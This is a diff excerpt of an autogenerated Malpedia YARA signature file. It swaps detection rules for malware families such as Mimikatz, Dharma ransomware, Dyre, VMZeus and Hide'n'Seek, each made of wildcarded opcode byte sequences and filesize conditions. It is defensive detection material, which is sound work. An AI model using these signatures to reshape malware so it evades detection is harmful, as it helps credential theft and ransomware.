-		$sequence_7 = { 8b7510 8bce ba???????? e8???????? 85c0 7414 8b5514 }
-		$sequence_8 = { 8b5104 57 ffd2 5f 5e }
-		$sequence_9 = { 8d95a0f9ffff 68???????? 52 ffd3 83c414 8dbdb0fdffff 32c0 }
+		$sequence_0 = { 7c0d e8???????? 84c0 7504 33c0 }
+		$sequence_1 = { 7907 32c0 e9???????? 7507 }
+		$sequence_2 = { 85c0 7509 e8???????? b001 }
+		$sequence_3 = { e9???????? 7507 b001 e9???????? }
+		$sequence_4 = { e9???????? 3d2c5c0700 750a e8???????? e9???????? }
+		$sequence_5 = { 488d4dc8 4183c8ff 488bd0 488bd8 e8???????? 488bcb }
+		$sequence_6 = { 41ffc1 ba23000000 48895c2428 48895c2420 e8???????? }
+		$sequence_7 = { ff75fc 8ad8 e8???????? 83c414 84db 7511 }
+		$sequence_8 = { 6aff 68???????? 6a01 8d4dec 51 }
+		$sequence_9 = { 50 50 ff7510 ff750c 50 ff7508 }
 
 	condition:
-		7 of them and filesize < 360448
+		7 of them and filesize < 658432
 }
-rule MALPEDIA_Win_Rifdoor_Auto : FILE
+rule MALPEDIA_Win_Jessiecontea_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c64cc60e-de43-57ba-a8c5-3da8fe6ea09a"
+		id = "ed5d981c-49e8-5f40-808b-1f7fc2ae5113"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rifdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.rifdoor_auto.yar#L1-L168"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jessiecontea"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jessiecontea_auto.yar#L1-L165"
 		license_url = "N/A"
-		logic_hash = "4a7031572d6960be3c18bec0c177698078092abb2ffc70b93030291dca57dff4"
+		logic_hash = "f376a26e7b2528bac10debe17ecc06d45573d24dcd0617a6c31e158d3d59f89a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127613,38 +127545,38 @@ rule MALPEDIA_Win_Rifdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7404 3bc3 7508 c744242401000000 8d4c2410 }
-		$sequence_1 = { 895c2410 8d442410 50 b808000000 b9???????? e8???????? }
-		$sequence_2 = { 56 bf12000000 e8???????? 83c404 }
-		$sequence_3 = { c1e006 03048d605d4100 eb05 b8???????? }
-		$sequence_4 = { 8b4c2408 51 ff15???????? 5f 83c408 c3 }
-		$sequence_5 = { 6a00 6a12 8d54240c 52 50 }
-		$sequence_6 = { 85c0 7518 5e 8b8c2404010000 33cc e8???????? 81c408010000 }
-		$sequence_7 = { 7d0e 885c301c 017e5c 8b465c 3bc1 }
-		$sequence_8 = { 80bd98feffff00 8d8598feffff 740d 8bc8 }
-		$sequence_9 = { c1eb10 22d3 8bde 8bc8 }
-		$sequence_10 = { 03c2 8b9540fbffff 89853cfbffff 52 8d8544fbffff }
-		$sequence_11 = { 8bec 53 56 8b35???????? 57 3b35???????? 7d4a }
-		$sequence_12 = { ff15???????? 85c0 0f85cf000000 803d????????00 b8???????? }
-		$sequence_13 = { 5d c3 6a04 8d45dc 50 6a08 }
-		$sequence_14 = { 33c0 898540bdffff 898544bdffff 898548bdffff 89854cbdffff 8b8558bdffff }
-		$sequence_15 = { ff15???????? 8d85e8fbffff 50 8bc8 51 ff15???????? e9???????? }
+		$sequence_0 = { 8d85a8f9ffff 50 8d85f8fbffff 50 ff15???????? }
+		$sequence_1 = { 8b7d18 8945c0 8b4510 8945c4 8b451c }
+		$sequence_2 = { 660fdbe3 660fdfc8 660febe1 3bd6 0f826effffff 660ffee5 0f28c4 }
+		$sequence_3 = { e8???????? 83c418 c7857cf0ffffffffff7f c78580f0ffffffffff7f b8ea650000 c7858cf0ffff00000000 }
+		$sequence_4 = { 50 51 8d8df8f7ffff e8???????? 8d85f8f7ffff 6a5c 50 }
+		$sequence_5 = { 745b 8b35???????? 57 ffd6 3d04010000 7d4b }
+		$sequence_6 = { 83c404 85f6 7425 8bbd7cf4ffff 68???????? }
+		$sequence_7 = { 7f0a 8bb5f0b7ffff 3bfe 7293 }
+		$sequence_8 = { 452be5 488d152b6bfeff 4489642440 0f8574fcffff }
+		$sequence_9 = { 6603c1 0fb70d???????? 0fb7c0 33c8 66898dde000000 }
+		$sequence_10 = { 83c008 668945d8 0fb705???????? 83c008 668945da }
+		$sequence_11 = { 6683c00c 0fb7c8 8b05???????? 33c1 6689459c 8b4580 }
+		$sequence_12 = { 4889542440 488bfa be01000000 ff15???????? }
+		$sequence_13 = { 4889442430 488d4e10 4889442428 4c8bcb }
+		$sequence_14 = { 4533c9 4889742420 4c8d85d0040000 488bcf 488d95e0050000 }
+		$sequence_15 = { 817c2440949dd460 7489 33c0 4c8ba424880b0000 488b9c24800b0000 }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 413696
 }
-rule MALPEDIA_Win_Flowershop_Auto : FILE
+rule MALPEDIA_Win_Dharma_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "40619a48-6b17-5bee-8aad-65bf7cac75aa"
+		id = "e4f9cff7-2b7e-5614-97de-e64666dbaa6b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.flowershop"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.flowershop_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dharma_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "ba2d45fad977755fd044c78f8aeed860d85d236ff95a62d89180f428b8bcb5e7"
+		logic_hash = "ed48c8d46095165b3771ad3d606dd9e4c3ca951524311f4024cd2a8039cd375d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127658,32 +127590,32 @@ rule MALPEDIA_Win_Flowershop_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3b45f0 74e0 8945f0 6a08 8d45f0 6a00 50 }
-		$sequence_1 = { 5e c3 56 33f6 8935???????? e8???????? a1???????? }
-		$sequence_2 = { ff75e0 e8???????? 83c418 85c0 750e c705????????01000000 33c0 }
-		$sequence_3 = { 59 85c0 59 741f 8b07 0105???????? }
-		$sequence_4 = { 51 56 57 33ff 897df8 897dfc c745f898c3fead }
-		$sequence_5 = { 894d0c 76bb 33c0 5f 5e 5b c9 }
-		$sequence_6 = { eb71 0fb605???????? 6bc07c 50 8d85f9e0ffff 68???????? 50 }
-		$sequence_7 = { 33c9 83c60c 81fe???????? 72d8 85c9 0f8471ffffff }
-		$sequence_8 = { 8b7510 8b7dfc 837e0400 750b 817e0818350000 7502 ff17 }
-		$sequence_9 = { 2b01 c3 8b442404 8b542408 8b4804 03ca }
+		$sequence_0 = { 51 8b5510 52 8b450c 50 8b4df0 c1e105 }
+		$sequence_1 = { c1ea10 81e2ff000000 8b048db8b34000 330495b8b74000 }
+		$sequence_2 = { 50 e8???????? 83c408 c785c4fdffff01000000 8b8dd4fdffff 51 e8???????? }
+		$sequence_3 = { 51 8b55fc 52 ff15???????? 8b4df8 89048db8864100 8b55f8 }
+		$sequence_4 = { 8b4508 8b4d08 8908 c745f801000000 8b5510 c70201000000 8b45f8 }
+		$sequence_5 = { 51 6a00 8b55ec 52 e8???????? 83c40c 8b45ec }
+		$sequence_6 = { 8b45fc 50 e8???????? 50 6a00 }
+		$sequence_7 = { 50 8b4d10 51 8d95e0fdffff 52 e8???????? 83c410 }
+		$sequence_8 = { 8b4d08 0fb6548121 8b8590feffff 0b9485b8feffff 8b8d90feffff 89948db8feffff }
+		$sequence_9 = { 68feff0000 e8???????? 83c404 8945ac e8???????? 8945d0 6a02 }
 
 	condition:
-		7 of them and filesize < 829440
+		7 of them and filesize < 204800
 }
-rule MALPEDIA_Win_Pcshare_Auto : FILE
+rule MALPEDIA_Elf_Hideandseek_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7a2279a4-a61d-58a7-97d7-adf12e2edb7d"
+		id = "10c8f40f-fa57-553f-afa8-26796ff221f6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pcshare"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pcshare_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/elf.hideandseek_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "2997345c16432720db338f1e799076d538b35e40830e87863ce57c0bb0f81979"
+		logic_hash = "768ba339bd4afb32724f528de613e471a16c477a1e04b8333f9c4f37161d943f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127697,32 +127629,32 @@ rule MALPEDIA_Win_Pcshare_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 803c3800 75db 8b16 33c0 8a0c3a 5f 84c9 }
-		$sequence_1 = { 8db60c2c0610 6a00 50 ff36 e8???????? }
-		$sequence_2 = { 8b442450 3bc3 7425 33f6 8b0c06 }
-		$sequence_3 = { 81e20000ffff c7401400000000 0bca 89480c 8b4c2440 8b542438 }
-		$sequence_4 = { 8b4c242c 85c9 7510 3b5c2430 746b 43 }
-		$sequence_5 = { 8b01 03f8 8b5640 8b6e24 52 51 8bcc }
-		$sequence_6 = { 8b5b04 03d8 c60300 8b442428 50 }
-		$sequence_7 = { 8d0480 8d0c80 8d048a 3d35c83301 0f8cea000000 68???????? }
-		$sequence_8 = { 8b16 8d441a02 50 55 ff15???????? 85c0 890437 }
-		$sequence_9 = { 8b4548 8b4c241c 8b1408 8b442420 8b4c020c 8d44020c }
+		$sequence_0 = { 740d 83ec0c ff36 e8???????? 83c410 56 56 }
+		$sequence_1 = { e8???????? eb09 83ec0c 56 e8???????? 83c410 f7df }
+		$sequence_2 = { 89c7 85c0 0f8947040000 e9???????? 83be4c01000018 0f87f7040000 8b864c010000 }
+		$sequence_3 = { 84d2 7410 8a53ff 8d43ff 3a542403 7404 84d2 }
+		$sequence_4 = { e8???????? 8b35???????? 83c410 8d78f0 eb45 8b442410 31d2 }
+		$sequence_5 = { 31f6 8b5c240c 803d????????00 7532 e8???????? 88c2 89c1 }
+		$sequence_6 = { b801000000 83c410 c684331001000000 c7864c0100000b000000 c7863801000000000000 eb09 b803000000 }
+		$sequence_7 = { e8???????? c7874801000004000000 58 5a 8d84243a010000 50 8d8710010000 }
+		$sequence_8 = { c1e806 f7d0 83e001 c3 31c0 c3 8b4c2404 }
+		$sequence_9 = { 5a 85c0 59 0f8f1dffffff 50 8b442454 }
 
 	condition:
-		7 of them and filesize < 893708
+		7 of them and filesize < 196608
 }
-rule MALPEDIA_Win_Mimikatz_Auto : FILE
+rule MALPEDIA_Win_Dyre_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "aca0d4e4-4192-5121-a9cd-9ca0e401c83a"
+		id = "71a1cda5-bbc1-5437-8a4b-d424fa7e7598"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mimikatz"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mimikatz_auto.yar#L1-L209"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dyre_auto.yar#L1-L228"
 		license_url = "N/A"
-		logic_hash = "3624438eda15e47ae98de9ad5feae5e5f01b75b23634de1325ad601ffd44065d"
+		logic_hash = "af535d590e4b9fb30bcfd8419a9c576a8fa6a184366164dc5fc0ce71c5e82236"
 		score = 75
 		quality = 73
 		tags = "FILE"
@@ -127736,44 +127668,45 @@ rule MALPEDIA_Win_Mimikatz_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83f8ff 750e ff15???????? c7002a000000 }
-		$sequence_1 = { f7f1 85d2 7406 2bca }
-		$sequence_2 = { 3c02 7207 e8???????? eb10 }
-		$sequence_3 = { eb84 668b442430 eb1d 834608fe }
-		$sequence_4 = { 83f812 72f1 33c0 c3 }
-		$sequence_5 = { e8???????? 83c8ff e9???????? 8d0412 89442438 }
-		$sequence_6 = { ff15???????? 85c0 0f94c3 85db 7508 }
-		$sequence_7 = { 6683f83f 7607 32c0 e9???????? }
-		$sequence_8 = { c3 81f998000000 7410 81f996000000 7408 }
-		$sequence_9 = { 66894108 33c0 39410c 740b }
-		$sequence_10 = { ff15???????? bd6f000000 3bc3 7405 }
-		$sequence_11 = { e8???????? 8bf0 85c0 7433 8b542478 d1ea 7420 }
-		$sequence_12 = { ff15???????? 3bc7 0f84d4010000 8b542430 }
-		$sequence_13 = { 2bc1 85c9 7403 83c008 }
-		$sequence_14 = { 83fb04 7cdc 8b5df8 8ad3 02d2 8ac7 c0e804 }
-		$sequence_15 = { 83e001 51 894614 c7461ce0164000 c74620f0164000 c7462410174000 }
-		$sequence_16 = { 897e14 897e70 c686c800000043 c6864b01000043 c7466878d14600 6a0d }
-		$sequence_17 = { c745fc00000000 ff15???????? 50 e8???????? 8bd8 }
-		$sequence_18 = { 03c2 c1f802 57 50 33db 33f6 e8???????? }
-		$sequence_19 = { 6a00 50 e8???????? 83c40c c7450800000000 }
-		$sequence_20 = { 83f805 7d10 668b4c4310 66890c45b8e14600 40 }
-		$sequence_21 = { c705????????cf2f4000 8935???????? a3???????? ff15???????? a3???????? 83f8ff }
+		$sequence_0 = { 6800004000 6800000400 ff15???????? a3???????? 85c0 }
+		$sequence_1 = { 747c 8d4602 50 e8???????? 8bf8 }
+		$sequence_2 = { 33c8 894304 895308 894b10 c745ec10000000 837df400 0f84f7000000 }
+		$sequence_3 = { 59 85c0 740d 8d4801 3b4d14 }
+		$sequence_4 = { 742e 53 8bc7 e8???????? 8bd8 }
+		$sequence_5 = { 81ec14010000 8364240400 53 56 57 }
+		$sequence_6 = { 59 83f8ff 7549 33ff 83f8ff 7542 }
+		$sequence_7 = { 33d2 f7f3 3bd6 7409 }
+		$sequence_8 = { 4883ec20 488bd9 b910270000 ff15???????? 488bcb }
+		$sequence_9 = { 488bcd ff15???????? 488b5c2460 8bc7 4883c440 }
+		$sequence_10 = { 4883ec20 488b0d???????? 33d2 ff15???????? }
+		$sequence_11 = { 488b4c2458 488d442450 8d5301 4533c9 4533c0 4889442420 895c2450 }
+		$sequence_12 = { 488bd9 83fa04 763b 0f1f00 0fb74b02 ff15???????? }
+		$sequence_13 = { 4883ec20 448b4124 33ff 488bf2 428d04c500000000 488bd9 014120 }
+		$sequence_14 = { 488bcb ff15???????? ffc7 034310 8d740627 413bfc 7cdf }
+		$sequence_15 = { 488bcd 897c2470 48897c2420 ff15???????? 85c0 }
+		$sequence_16 = { 668b1401 668910 83c002 4e 75f3 }
+		$sequence_17 = { 85db 7416 57 8bfa 2bfe 90 }
+		$sequence_18 = { 8bd8 56 8bf1 85db 7416 }
+		$sequence_19 = { 50 a1???????? 6a08 50 ff15???????? 8bd8 }
+		$sequence_20 = { ff15???????? 8bf0 8d85d4fdffff 50 }
+		$sequence_21 = { 90 ff15???????? 8a0437 8806 46 4b }
+		$sequence_22 = { 833d????????00 751b 6a00 6800004000 6800000400 }
 
 	condition:
-		7 of them and filesize < 1642496
+		7 of them and filesize < 590848
 }
-rule MALPEDIA_Win_Graphical_Neutrino_Auto : FILE
+rule MALPEDIA_Win_Pipcreat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b8be2926-4142-5b9c-963d-8827c1d257eb"
+		id = "ff44b514-0bd0-5060-9863-69f45ed3246f"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphical_neutrino"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.graphical_neutrino_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipcreat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pipcreat_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "738cd6fc4267dd6a5687776cc638194fdfe1e78d0e84383b17d6f440ed210297"
+		logic_hash = "8b0c4b69f4a54d875f228245ca03fbe66625db30fecf518efb33a362af79adb3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127787,32 +127720,32 @@ rule MALPEDIA_Win_Graphical_Neutrino_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 56 53 498b18 458b5808 }
-		$sequence_1 = { e8???????? 4c89e1 4c89f2 4c8d4010 }
-		$sequence_2 = { 8b6c242c 48637c2428 8d743d00 39f7 7f2b 83fe0f }
-		$sequence_3 = { 83c030 83c230 8806 488d4602 885601 }
-		$sequence_4 = { 488d8424d8020000 4c8dbc24c8020000 48898424c8020000 488d442460 }
-		$sequence_5 = { 488b742470 4c8b7c2450 8a05???????? 84c0 }
-		$sequence_6 = { 7518 488b5108 48c1e004 480302 }
-		$sequence_7 = { 4863ee 4d89e0 488d4c2b02 e8???????? 488d5302 b030 89f1 }
-		$sequence_8 = { 4c8b4c2438 eb26 4584f6 750e 488b17 428a1422 88541d5a }
-		$sequence_9 = { 4885d2 0f840d020000 8a02 ffc8 3c01 0f8701020000 }
+		$sequence_0 = { 6800100000 50 ff35???????? e8???????? 83c40c 5f }
+		$sequence_1 = { 6a00 8d442420 6a00 50 6a01 6a02 6a20 }
+		$sequence_2 = { 83c418 85c0 7436 56 ff35???????? ff15???????? }
+		$sequence_3 = { 33c0 c3 8b0d???????? 51 ff15???????? }
+		$sequence_4 = { e8???????? 83c40c ff15???????? 6a3f a3???????? 33db }
+		$sequence_5 = { 6a02 6a20 68ff010f00 53 57 52 ffd5 }
+		$sequence_6 = { 40 3b4510 7cf6 ff35???????? ff15???????? 5f 8bc3 }
+		$sequence_7 = { 6a00 57 ff15???????? 83c002 83c408 8bf8 66833f00 }
+		$sequence_8 = { 6a30 6868420010 eb07 6a28 }
+		$sequence_9 = { a5 50 33db ff35???????? a4 ff15???????? }
 
 	condition:
-		7 of them and filesize < 674816
+		7 of them and filesize < 65536
 }
-rule MALPEDIA_Win_Andardoor_Auto : FILE
+rule MALPEDIA_Win_Electric_Powder_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "36610ce1-8689-5760-8490-3c048dd08128"
+		id = "70f1fd4f-5a0a-57d1-8155-729a3e15c844"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.andardoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.andardoor_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.electric_powder"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.electric_powder_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "77bea7a2d8aed8c22ef97e06e53b736b63004170333d5461958719ea43d8bb7c"
+		logic_hash = "801118c2f636f6d2e21f384ccb7f80375d94dda489cf095ec07a8f466a0ae16c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127826,32 +127759,32 @@ rule MALPEDIA_Win_Andardoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? eb7d 33d2 488d8db0030000 41b808020000 e8???????? 33d2 }
-		$sequence_1 = { 90 0fb7840da8030000 6689840dd0040000 488d4902 6685c0 75e7 }
-		$sequence_2 = { 75f4 4c8d043f 488d9560030000 488d4c2468 e8???????? 488b35???????? }
-		$sequence_3 = { 488b05???????? 4833c4 4889842450400000 33c0 }
-		$sequence_4 = { 482bfe 0f1f4000 660f1f840000000000 0fb701 }
-		$sequence_5 = { 4d894bc8 458a4b28 498943e8 488b8424b0000000 498953b8 498d53b8 4d8943c0 }
-		$sequence_6 = { 488d4c2440 ff15???????? 85c0 7551 }
-		$sequence_7 = { 488bc8 e8???????? e8???????? 488b0d???????? 488d542450 4881c108020000 c744245004010000 }
-		$sequence_8 = { 498bc8 498bd8 e8???????? 33c9 85c0 }
-		$sequence_9 = { 4883cfff 0f1f8000000000 664439647802 488d7f01 75f4 4c8d043f 488d9560030000 }
+		$sequence_0 = { 85c0 0f84b6130000 8d8de0fbffff 8d5720 8d7102 668b01 83c102 }
+		$sequence_1 = { 8d8d68faffff e9???????? 8d8d5cf9ffff e9???????? 8d8df8faffff e9???????? 8b857cf9ffff }
+		$sequence_2 = { 3bd8 0f42d8 8d4301 85c0 7504 33f6 eb34 }
+		$sequence_3 = { 8b35???????? 81c230750000 89b574f9ffff 52 ffd6 68???????? 6a01 }
+		$sequence_4 = { 3b4e08 0f838e010000 8b4604 c704c810000000 8b5608 83ea01 }
+		$sequence_5 = { 0f4dd0 7ce7 56 8d7207 83e6f8 3bd6 }
+		$sequence_6 = { c645fc79 e8???????? c785e0fbffff00000000 81cf00010000 c785e4fbffff00000000 }
+		$sequence_7 = { c60600 8d8d30fcffff e8???????? 8d8520fdffff ba???????? 50 8d8da0fbffff }
+		$sequence_8 = { 8947fc eb0b 50 e8???????? 83c404 8bf8 8b4dfc }
+		$sequence_9 = { 8bf0 e9???????? 8b45f8 46 8b541004 8955ec 3bf2 }
 
 	condition:
-		7 of them and filesize < 339968
+		7 of them and filesize < 565248
 }
-rule MALPEDIA_Win_Cookiebag_Auto : FILE
+rule MALPEDIA_Win_Vmzeus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a1b2ec8f-a75e-5a6d-8c41-80da5c8e831c"
+		id = "4b33099d-6223-5a8a-8424-386c7b1a44ee"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cookiebag"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cookiebag_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vmzeus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vmzeus_auto.yar#L1-L114"
 		license_url = "N/A"
-		logic_hash = "2cb20734fcd81a355448bc2557be61a5fdc54ceb6b9b3a4d3d93ee10aa49b59c"
+		logic_hash = "17e1987d98b8da94f97f8bd71f2765f1dddeafbd1967101797951278b17d5b65"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127865,32 +127798,32 @@ rule MALPEDIA_Win_Cookiebag_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? bf???????? 83c9ff 33c0 c644247403 f2ae f7d1 }
-		$sequence_1 = { 83e00f eb02 33c0 0fbe84c1a0e24100 c1f804 83f807 }
-		$sequence_2 = { 2bc2 83f801 8a5cbc2c 7705 }
-		$sequence_3 = { 896c2458 896c245c 741d 8d48ff 8a40ff 84c0 740a }
-		$sequence_4 = { e9???????? 49 51 e8???????? 83c404 e9???????? 8a8c2484000000 }
-		$sequence_5 = { 47 83f80b 0f8777020000 ff248509c44100 80fb31 7c0c }
-		$sequence_6 = { e8???????? 8b4c242c 8b442428 45 83c710 e9???????? 50 }
-		$sequence_7 = { 8bd8 8dbe98000000 6a01 53 8bcf e8???????? 84c0 }
-		$sequence_8 = { 8bf8 8d9e04010000 6a01 57 8bcb e8???????? 84c0 }
-		$sequence_9 = { 889c24b8000000 e8???????? 8d44242c 8d4c241c 50 8d542460 51 }
+		$sequence_0 = { f3a4 b001 eb02 32c0 }
+		$sequence_1 = { 7508 6a04 58 e9???????? 32c0 6a4c }
+		$sequence_2 = { 6a4c 8d7c242c 59 f3aa }
+		$sequence_3 = { f3a4 b001 eb02 32c0 5f 5e }
+		$sequence_4 = { 58 e9???????? 32c0 6a4c 8d7c242c 59 f3aa }
+		$sequence_5 = { e9???????? 32c0 6a4c 8d7c242c }
+		$sequence_6 = { 58 e9???????? 32c0 6a4c 8d7c242c }
+		$sequence_7 = { 7508 6a04 58 e9???????? 32c0 }
+		$sequence_8 = { 6a10 32c0 59 8bfb }
+		$sequence_9 = { 6a04 58 e9???????? 32c0 6a4c }
 
 	condition:
-		7 of them and filesize < 311296
+		7 of them and filesize < 475136
 }
-rule MALPEDIA_Win_Soundbill_Auto : FILE
+rule MALPEDIA_Win_Unidentified_103_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "fc6eb91d-5824-524d-bbb8-b5d2b50f1e71"
+		id = "b558874c-ad8a-53b0-9aa8-68edfb2b5b00"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.soundbill"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.soundbill_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_103"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.unidentified_103_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "23246153789cca2dc7fd1119b61492f6729a30eebbbf9247088b38725417e92a"
+		logic_hash = "53bab14606fb94c26c9c4250a4ba5d5b69e3e483ae51cdbc9cd021b3f09f3c4b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -127904,32 +127837,32 @@ rule MALPEDIA_Win_Soundbill_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 55 56 4881ecb0030000 488b05???????? 4833c4 4889842470030000 488b8424f0030000 }
-		$sequence_1 = { 488b8da0000000 e8???????? 4883c420 5d c3 488d8a70000000 e9???????? }
-		$sequence_2 = { 750e 85c9 0f95c0 8806 83f901 760c eb03 }
-		$sequence_3 = { 48894a08 488d4808 e8???????? 488d0579b00200 488903 488bc3 4883c420 }
-		$sequence_4 = { f20f5ce9 f2410f1004c1 488d15562b0100 f20f1014c2 }
-		$sequence_5 = { c644243001 44397c2440 7f10 ff442434 4885c9 7426 c644243c01 }
-		$sequence_6 = { 483305???????? 488d1516b70200 488bcb 488905???????? ff15???????? 483305???????? }
-		$sequence_7 = { ffd7 4c8bf0 4885c0 751e 498bcf ff15???????? 488bce }
-		$sequence_8 = { 418d542416 488d0d3f4b0100 e8???????? 488b0b 66443921 488bcb 744d }
-		$sequence_9 = { 8b4018 25c0010000 83f840 0f84e7010000 }
+		$sequence_0 = { 89c3 ffd6 897c2408 c744240400000000 890424 ff942488000000 }
+		$sequence_1 = { 897c2434 8bbc2450010000 894c2430 8b8c244c010000 }
+		$sequence_2 = { 8944246c 8d842419010000 c784241901000061647661 c784241d01000070693332 c78424210100002e646c6c 890424 }
+		$sequence_3 = { 8b3c24 85ff 743a c6012d c6441e0200 89d3 0fb60c06 }
+		$sequence_4 = { 8b8424c4000000 ffd0 83ec04 c684249001000000 8dac240c060000 c78424c403000000000000 }
+		$sequence_5 = { 8b842440010000 89442418 8b842438010000 89442414 8b8424d0000000 8b00 89442404 }
+		$sequence_6 = { 8d54244a 83c001 803c0200 75f7 8b8c2498000000 c744240c34020000 }
+		$sequence_7 = { c78424a60000007072696e c68424ac00000000 e8???????? b865000000 31db c784241c03000028010000 c7842433010000576d6950 }
+		$sequence_8 = { 89442404 c78424d201000052656164 c78424d601000046696c65 c68424da01000000 e8???????? 891c24 8984241c010000 }
+		$sequence_9 = { 897c2420 8bbc2444010000 897c241c 8bbc2440010000 897c2418 8bbc2488010000 }
 
 	condition:
-		7 of them and filesize < 973824
+		7 of them and filesize < 188416
 }
-rule MALPEDIA_Win_Koobface_Auto : FILE
+rule MALPEDIA_Win_Powerduke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "26b0388c-a8f9-5f6a-a459-0177fcecc6df"
+		id = "b1a14b33-ddbf-5df6-8a25-665602dd43b2"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface"
